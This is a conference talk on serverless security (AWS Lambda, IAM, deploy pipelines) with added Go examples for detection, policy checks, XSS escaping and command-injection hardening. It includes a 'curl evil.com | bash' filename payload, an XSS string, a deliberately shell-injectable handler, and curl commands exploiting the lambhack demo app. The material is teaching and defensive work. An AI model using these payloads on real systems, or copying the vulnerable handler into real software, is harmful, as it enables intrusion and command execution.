Serverless Security: Are You Ready for the Future?
Posted on 17-Mar-2018
#RSAC
SESSION ID: ASD-F01
James Wickett
Head of Research, Signal Sciences
@wickett

James Wickett
Head of Research at Signal Sciences
Author, DevOps Fundamentals at lynda.com
Author of a book on DevOps (email me for a free copy: james@signalsciences.com)
Blogger at theagileadmin.com and labs.signalsciences.com
Conclusion
Serverless encourages functions as deploy units, coupled with third-party services that allow running end-to-end applications without worrying about system operation.
New serverless patterns are just emerging
Security with serverless is easier
Security with serverless is harder

Conclusion (2)
Four key areas apply to serverless security:
Software Supply Chain Security
Delivery Pipeline Security
Data Flow Security
Attack Detection
New! A very vulnerable Lambda stack, open source: github.com/wickett/lambhack
What is Serverless?

Misconceptions
It's marketing (cloud rebranded)
Serverless == no servers
Serverless == Backend as a Service
Serverless == Platform as a Service
TK: AdrianCO quote

So, what is Serverless?
http://martinfowler.com/articles/serverless.html
@mikebroberts

"Serverless was first used to describe applications that significantly or fully depend on 3rd party applications / services ('in the cloud') to manage server-side logic and state."
http://martinfowler.com/articles/serverless.html

"Serverless can also mean applications where some amount of server-side logic is still written by the application developer but unlike traditional architectures is run in stateless compute containers that are event-triggered, ephemeral (may only last for one invocation), and fully managed by a 3rd party."
http://martinfowler.com/articles/serverless.html
History of Serverless
2012 - used to describe BaaS and Continuous Integration services run by third parties
Late 2014 - AWS launched Lambda
July 2015 - AWS launched API Gateway
October 2015 - AWS re:Invent - The Serverless company using AWS Lambda
2015 to present - Frameworks forming
2016 - Serverless Conference
http://www.slideshare.net/AmazonWebServices/arc308-the-serverless-company-using-aws-lambda
Old School Arch (diagram): Client -> Proxy/LB -> Server, Server, Server -> Database

Serverless Arch (diagram): Client -> Web Delivery / Auth Service / API Gateway -> Function A, Function B -> Database Service
What can we say is serverless?
Serverless is Functions as a Service (FaaS)
Containers on Demand
Serverless is (no management of) Servers
Serverless IS SERVICEFULL
Serverless is an opinionated framework for compute
Serverless encourages functions as deploy units, coupled with third-party services that allow running end-to-end applications without worrying about system operation.
A Short History of Cloud
Virtualization
"The Cloud"
DevOps
SaaS, PaaS, IaaS
Private Cloud
Then, along came containers
containers are teh hawtness
Lots of effort in Container Orchestration
The Cloud was to Virtualization as Serverless will be to Containers
"If you want to lead your company bravely into the new world, you would do well to focus a lot on how serverless will evolve." - @Cloudopinion
https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
So, what are the upsides?
Scaling built in
Pay for what you use, in 100ms increments
With Serverless, system administration is (mostly) lower
Serverless is implicit Microservices
Short-circuits Ops and moves the infrastructure runtime closer to devs
You can skip Chefing and Dockering all the things!
Lean Startup friendly
Increased velocity
Great, what's the catch?
Ops burden to rationalize the Serverless model (specifically Deploy)
Monitoring
Logging
Stateless for real, with no persistence* across function runs
Vendor Lock-In
Security
Reliability
Serverless Use Cases
Image resizing
Queue processing
http://martinfowler.com/articles/serverless.html
Run a web application
API Gateway
http://martinfowler.com/articles/serverless.html
CI/CD
Security is the same and different
What used to be system calls is now distributed computing over the network
Serverless shifts attack surface to third parties
Let's try a sample application in AWS
Go Sparta
Golang!
AWS Lambda supports bring your own binary
Sparta wraps your binary with a node.js shim

Other options
Serverless Framework
APEX
Kappa

Wordy
Analyzes textual occurrences given a block of text, returns a JSON count of words
Calls an API under the hood to get the text
It is comprised of Lambda, S3 and API Gateway

go run main.go provision -s S3_BUCKET
What I learned about serverless security

Security

Four areas of Serverless Security
Secure Software Supply Chain
Delivery Pipeline
Data Flow Security
Attack Detection

Secure Software Supply Chain
Surface area reduction!
Surface area expansion!
SSL / TLS from the provider (diagram: old way vs. new way)
Routing from the provider (diagram: old way vs. new way)
Lambda + S3 + Kinesis + DynamoDB + CloudFormation + API Gateway + Auth0

Abuse of open IAM privs
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds

Recommendation: use a third-party service to monitor for provider config changes

Provider Security
Disable root access keys
Manage users with profiles
Secure your keys in your deploy system
Secure keys in your dev system
Use provider MFA
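The recommendation to monitor for provider config changes, and the provider-security list just above it (root keys, MFA, deploy-system keys), both come down to reading the audit trail the provider already emits. The Go program below is an added example written for this page, not code from the deck, from lambhack or from Signal Sciences: it runs three illustrative rules over constructed CloudTrail records (the `deploy-bot` principal, user names, timestamps and IP addresses are all made up for the example). Any root-account call, any of a short list of IAM changes, and any Lambda or API Gateway change made by a principal other than the deploy system each produce an alert.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"strings"
)

// Record keeps only the CloudTrail fields the rules below consult.
type Record struct {
	EventTime    string `json:"eventTime"`
	EventSource  string `json:"eventSource"`
	EventName    string `json:"eventName"`
	SourceIP     string `json:"sourceIPAddress"`
	UserIdentity struct {
		Type     string `json:"type"`
		UserName string `json:"userName"`
	} `json:"userIdentity"`
}

// Alert pairs the rule that fired with the record that triggered it.
type Alert struct {
	Rule   string
	Record Record
}

// deployPrincipal is the IAM user the deploy system acts as. The name is an
// assumption of this example; substitute your pipeline's principal.
const deployPrincipal = "deploy-bot"

// iamChanges: calls that alter who can do what (illustrative, not exhaustive).
var iamChanges = map[string]bool{
	"CreateAccessKey": true, "CreateUser": true, "DeleteUser": true,
	"PutUserPolicy": true, "PutRolePolicy": true, "AttachUserPolicy": true,
	"AttachRolePolicy": true, "DeactivateMFADevice": true,
}

// stackChanges: calls that alter what the serverless stack runs or exposes.
var stackChanges = map[string]bool{
	"UpdateFunctionCode": true, "UpdateFunctionConfiguration": true,
	"AddPermission": true, "PutRestApi": true, "CreateDeployment": true,
}

// Detect scans newline-delimited CloudTrail records and applies three rules:
// any root-account activity, any listed IAM change, and any stack change by
// a principal other than the deploy system. Root wins where rules overlap.
func Detect(trail string) ([]Alert, error) {
	var alerts []Alert
	sc := bufio.NewScanner(strings.NewReader(trail))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		var r Record
		if err := json.Unmarshal([]byte(line), &r); err != nil {
			return nil, fmt.Errorf("unparseable record %q: %w", line, err)
		}
		switch {
		case r.UserIdentity.Type == "Root":
			alerts = append(alerts, Alert{"root-account-used", r})
		case r.EventSource == "iam.amazonaws.com" && iamChanges[r.EventName]:
			alerts = append(alerts, Alert{"iam-change", r})
		case stackChanges[r.EventName] && r.UserIdentity.UserName != deployPrincipal:
			alerts = append(alerts, Alert{"stack-change-outside-pipeline", r})
		}
	}
	return alerts, sc.Err()
}

// SampleTrail is constructed for this example; it is not real account data.
const SampleTrail = `
{"eventTime":"2017-02-08T21:47:00Z","eventSource":"lambda.amazonaws.com","eventName":"UpdateFunctionCode","sourceIPAddress":"198.51.100.10","userIdentity":{"type":"IAMUser","userName":"deploy-bot"}}
{"eventTime":"2017-02-08T22:02:10Z","eventSource":"lambda.amazonaws.com","eventName":"UpdateFunctionConfiguration","sourceIPAddress":"203.0.113.7","userIdentity":{"type":"IAMUser","userName":"alice"}}
{"eventTime":"2017-02-08T22:05:31Z","eventSource":"iam.amazonaws.com","eventName":"CreateAccessKey","sourceIPAddress":"203.0.113.7","userIdentity":{"type":"Root"}}
{"eventTime":"2017-02-08T22:06:02Z","eventSource":"iam.amazonaws.com","eventName":"AttachUserPolicy","sourceIPAddress":"203.0.113.7","userIdentity":{"type":"IAMUser","userName":"alice"}}
{"eventTime":"2017-02-08T22:09:45Z","eventSource":"lambda.amazonaws.com","eventName":"GetFunction","sourceIPAddress":"198.51.100.10","userIdentity":{"type":"IAMUser","userName":"deploy-bot"}}
`

func main() {
	alerts, err := Detect(SampleTrail)
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("%-30s %s %s %s by %s/%s from %s\n", a.Rule, a.Record.EventTime,
			a.Record.EventSource, a.Record.EventName, a.Record.UserIdentity.Type,
			a.Record.UserIdentity.UserName, a.Record.SourceIP)
	}
}
```

Against the sample trail the deploy-bot code push and the read-only GetFunction are silent; alice's configuration change, the root-account key creation and alice's policy attachment each raise one alert. The rule lists are a starting point, not a catalogue; the point is that with serverless the only place these changes are visible is the provider's audit log, so that log has to be read, not just retained.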
Delivery Pipeline Security

Unit Testing
Easier to mock
Harder to mock

Integration Testing

Configuration is part of delivery

Simple Deploy Pipeline Security
Only dev keys can push to 'dev'
Only the build/deploy system can push to pre-prod
Integration tests must pass in this env
Security validation must take place
Allow push to prod only by the deploy system
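The pipeline rules above and the "abuse of open IAM privs" slide earlier are both statements about IAM policy, so they can be checked the same way. The Go program below is an added example for this page, not anything from the deck or from lambhack: a small evaluator for the subset of IAM policy language the rules need (Allow/Deny, the * wildcard, explicit deny wins) plus a check that flags statements granting every action on every resource. The three policies, the `wordy-<stage>` function names and the 123456789012 account id are assumptions constructed for the example; Conditions, NotAction, resource policies and permission boundaries are out of scope, so use it to reason about the pipeline rules, not as a replacement for the provider's policy simulator.

```go
package main

import (
	"encoding/json"
	"strings"
)

// Statement and Policy model the subset of IAM policy evaluated here: Action
// and Resource as arrays (IAM also accepts a bare string); Condition,
// NotAction, resource policies and permission boundaries are out of scope.
type Statement struct {
	Effect   string   `json:"Effect"`
	Action   []string `json:"Action"`
	Resource []string `json:"Resource"`
}

type Policy struct{ Statement []Statement }

func ParsePolicy(doc string) (p Policy, err error) {
	err = json.Unmarshal([]byte(doc), &p)
	return p, err
}

// glob implements the IAM * wildcard: any run of characters, '/' included.
func glob(pattern, s string) bool {
	if pattern == "" {
		return s == ""
	}
	if pattern[0] == '*' {
		for i := 0; i <= len(s); i++ {
			if glob(pattern[1:], s[i:]) {
				return true
			}
		}
		return false
	}
	return s != "" && pattern[0] == s[0] && glob(pattern[1:], s[1:])
}

// matchAny reports whether any pattern matches value. fold lowercases both,
// because IAM action names are case-insensitive while ARNs are not.
func matchAny(patterns []string, value string, fold bool) bool {
	for _, p := range patterns {
		if fold {
			p, value = strings.ToLower(p), strings.ToLower(value)
		}
		if glob(p, value) {
			return true
		}
	}
	return false
}

// Allowed evaluates one identity policy: a matching Deny always wins,
// otherwise at least one matching Allow is required.
func Allowed(p Policy, action, resource string) bool {
	allowed := false
	for _, st := range p.Statement {
		if !matchAny(st.Action, action, true) || !matchAny(st.Resource, resource, false) {
			continue
		}
		if strings.EqualFold(st.Effect, "Deny") {
			return false
		}
		allowed = true
	}
	return allowed
}

// BroadStatements returns the indexes of Allow statements that grant every
// action on every resource: what a function with command execution inherits.
func BroadStatements(p Policy) []int {
	star := func(l []string) bool { return len(l) == 1 && l[0] == "*" }
	var out []int
	for i, st := range p.Statement {
		if strings.EqualFold(st.Effect, "Allow") && star(st.Action) && star(st.Resource) {
			out = append(out, i)
		}
	}
	return out
}

// FnPrefix: the Wordy sample's per-stage functions; 123456789012 is the
// documentation placeholder account id (an assumption of this example).
const FnPrefix = "arn:aws:lambda:us-east-1:123456789012:function:wordy-"

// Dev keys push only to dev; deploy-system keys are the only ones that push
// to pre-prod and prod and are explicitly denied dev; Open is the anti-pattern.
const (
	DevPolicyJSON = `{"Statement":[{"Effect":"Allow","Action":["lambda:UpdateFunctionCode",
	 "lambda:UpdateFunctionConfiguration"],"Resource":["` + FnPrefix + `dev"]}]}`
	DeployPolicyJSON = `{"Statement":[{"Effect":"Allow","Action":["lambda:UpdateFunctionCode"],
	 "Resource":["` + FnPrefix + `preprod","` + FnPrefix + `prod"]},
	 {"Effect":"Deny","Action":["lambda:*"],"Resource":["` + FnPrefix + `dev"]}]}`
	OpenPolicyJSON = `{"Statement":[{"Effect":"Allow","Action":["*"],"Resource":["*"]}]}`
)
```

With these policies `Allowed(dev, "lambda:UpdateFunctionCode", FnPrefix+"dev")` is true and the same call against the pre-prod or prod function is false; the deploy policy allows pre-prod and prod and its Deny statement keeps the deploy system out of dev even if a later Allow is added by mistake. `BroadStatements` flags only the open policy, which is the shape of execution role that turns the command-execution bug shown later in the deck into control of the whole account.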
Security Integration Testing
BDD-Security - github.com/continuumsecurity/bdd-security
Gauntlt - gauntlt.org
http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
Data Flow Security
Development: Data Flow Diagrams, Threat modeling
Runtime

"Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner."
https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a

Application layer DoS
Timeouts and Execution restrictions
Attack Detection
https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4

AppSec Greatest Hits (XSS, SQLi, command execution) still relevant 15 years later!

AppSec Problems

Types of Attacks
XSS, Injection, Deserialization, …
New surface area, similar problems
e.g. appending 'curl evil.com | bash' or <script>alert(1)</script> to the name of a file you upload to S3

Defense
Logging, emitting events
Vandium (SQLi) wrapper
Content Security Policy (CSP)
More things need to be done here…
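The filename XSS from the "Types of Attacks" slide and the CSP line from the "Defense" slide, as an added Go example (not code from the deck or from lambhack; the object keys are constructed): the vulnerable listing concatenates S3 object keys straight into HTML, the safe one lets html/template escape each key for the context it lands in, and the handler adds a Content-Security-Policy header so an inline script is blocked even if an escaping bug slips through.

```go
package main

import (
	"fmt"
	"html/template"
	"net/http"
	"net/http/httptest"
	"strings"
)

// SampleKeys are constructed S3 object keys as an uploader could choose them;
// the second is the payload from the slide.
var SampleKeys = []string{"report.pdf", "<script>alert(1)</script>.png"}

// VulnerableListing concatenates object keys straight into HTML, so a key is
// also markup: stored XSS with the filename as the vector.
func VulnerableListing(keys []string) string {
	var b strings.Builder
	b.WriteString("<ul>")
	for _, k := range keys {
		fmt.Fprintf(&b, `<li><a href="/files/%s">%s</a></li>`, k, k)
	}
	b.WriteString("</ul>")
	return b.String()
}

// listingTmpl renders the same markup through html/template, which escapes
// each value for the context it lands in (URL path vs. text node).
var listingTmpl = template.Must(template.New("listing").Parse(
	`<ul>{{range .}}<li><a href="/files/{{.}}">{{.}}</a></li>{{end}}</ul>`))

// SafeListing returns the escaped rendering of the keys.
func SafeListing(keys []string) (string, error) {
	var b strings.Builder
	err := listingTmpl.Execute(&b, keys)
	return b.String(), err
}

// CSP forbids inline and third-party script, so a payload that slips past
// escaping still does not execute in a browser that enforces the policy.
const CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"

// Handler is the listing as served behind the web delivery layer: escaped
// output plus the CSP header on every response.
func Handler(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Security-Policy", CSP)
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	if err := listingTmpl.Execute(w, SampleKeys); err != nil {
		http.Error(w, "render failed", http.StatusInternalServerError)
	}
}

// Serve runs Handler against an in-memory request and returns the response.
func Serve() *http.Response {
	rec := httptest.NewRecorder()
	Handler(rec, httptest.NewRequest("GET", "/files", nil))
	return rec.Result()
}

func main() {
	fmt.Println("vulnerable:", VulnerableListing(SampleKeys))
	safe, _ := SafeListing(SampleKeys)
	fmt.Println("escaped:   ", safe)
	fmt.Println("CSP header:", Serve().Header.Get("Content-Security-Policy"))
}
```

The escaped rendering turns the key into `&lt;script&gt;alert(1)&lt;/script&gt;.png` in the text node and percent-encodes it inside the href, so the same string can no longer close the element it is printed in. The object key never changed; only the rendering did, which is why a filename is as much untrusted input as a query parameter.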
New Thing Alert!
Want to make the point that appsec is still relevant in serverless
A vulnerable Lambda + API Gateway stack (born from the heritage of WebGoat, RailsGoat, Gruyere, …)
Introducing lambhack

lambhack
A vulnerable Lambda + API Gateway stack
Open source, MIT licensed
Released for the first time here at RSA
Includes arbitrary code execution via a query string
More work needed, PRs accepted and looking for community help
github.com/wickett/lambhack
// lambhack handler: the query-string parameter is passed straight to a shell runner
//command := lambdaEvent.PathParams["command"]
command := lambdaEvent.QueryParams["args"]
output := runner.Run(command)
Vulnerable code is also vulnerable in Serverless
Let's take a look at cmdexe in lambhack

uname -a
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

cat /proc/version
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=cat+/proc/version;+sleep+1"
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016

Let's see /tmp
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=ls+-la+/tmp;+sleep+1"
total 17916
drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 .
drwxr-xr-x 21 root root 4096 Feb 8 21:47 ..
-rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64

Lambda Reuse!
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=ls+/tmp;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/pargs=touch+/tmp/wickettfile;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64
wickettfile

Could we upload our own payload?
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=which+curl;+sleep+1"
> /usr/bin/curl
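What the lambhack snippet does, next to a hardened version, as an added Go example written for this page (it is not lambhack's or Sparta's code; it assumes a POSIX /bin/sh and coreutils on the host, and `sleep` is in the allow-list only so the deadline can be exercised). The vulnerable handler hands the `args` parameter to a shell exactly as the walkthrough shows, which is why `uname -a; sleep 1` runs two commands. The hardened one allow-lists the binary, passes an argv array with no shell, rejects shell metacharacters, caps input length and enforces an execution deadline: the "timeouts and execution restrictions" control from the data-flow section, applied inside the function.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"net/url"
	"os/exec"
	"strings"
	"time"
)

// argsParam pulls the raw ?args= value out of a query string the way API
// Gateway hands it to lambhack: '+' becomes a space, ';' is left alone.
func argsParam(rawQuery string) (string, error) {
	for _, kv := range strings.Split(rawQuery, "&") {
		if strings.HasPrefix(kv, "args=") {
			return url.QueryUnescape(strings.TrimPrefix(kv, "args="))
		}
	}
	return "", errors.New("missing args parameter")
}

// VulnerableHandle reproduces the lambhack behaviour: the parameter goes to a
// shell verbatim, so ';', '|', '$(...)' and friends are interpreted.
func VulnerableHandle(rawQuery string) (string, error) {
	args, err := argsParam(rawQuery)
	if err != nil {
		return "", err
	}
	out, err := exec.Command("/bin/sh", "-c", args).CombinedOutput()
	return string(out), err
}

// allowedBinaries is the complete set the hardened handler will run.
// "sleep" is listed only so the deadline path can be exercised.
var allowedBinaries = map[string]bool{"uname": true, "echo": true, "sleep": true}

// shellMeta is rejected in every argument even though no shell is involved:
// it keeps a later refactor (or a child that is itself a shell) from
// turning argument data back into syntax.
const shellMeta = ";|&$`<>()\\\"'\n"

// HardenedHandle runs an allow-listed binary with an argv array (no shell),
// caps the input size, and enforces an execution deadline tighter than the
// function's own timeout so a slow payload cannot hold the invocation.
func HardenedHandle(ctx context.Context, rawQuery string, limit time.Duration) (string, error) {
	args, err := argsParam(rawQuery)
	if err != nil {
		return "", err
	}
	if len(args) > 256 {
		return "", errors.New("args too long")
	}
	fields := strings.Fields(args)
	if len(fields) == 0 {
		return "", errors.New("empty command")
	}
	if !allowedBinaries[fields[0]] {
		return "", fmt.Errorf("binary %q not permitted", fields[0])
	}
	for _, f := range fields[1:] {
		if strings.ContainsAny(f, shellMeta) {
			return "", fmt.Errorf("argument %q contains shell metacharacters", f)
		}
	}
	ctx, cancel := context.WithTimeout(ctx, limit)
	defer cancel()
	out, err := exec.CommandContext(ctx, fields[0], fields[1:]...).CombinedOutput()
	if ctx.Err() == context.DeadlineExceeded {
		return "", errors.New("execution timed out")
	}
	return string(out), err
}

func main() {
	// The payload from the slides: uname -a followed by an injected sleep.
	const q = "args=uname+-a;+sleep+1"
	out, err := VulnerableHandle(q)
	fmt.Printf("vulnerable: %q err=%v\n", out, err)
	out, err = HardenedHandle(context.Background(), q, 500*time.Millisecond)
	fmt.Printf("hardened:   %q err=%v\n", out, err)
}
```

Run with the slide's payload, the vulnerable handler returns the kernel string and pauses for the injected `sleep`; the hardened handler refuses at the `-a;` argument before anything executes. Note what the hardening does not change: the function still runs under its execution role, and `/tmp` still survives between invocations on a reused container, so allow-listing the command is the first layer, not the last.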
XSS, SQLi, … More to come!
Let's talk!
James Wickett
james@signalsciences.com
@wickett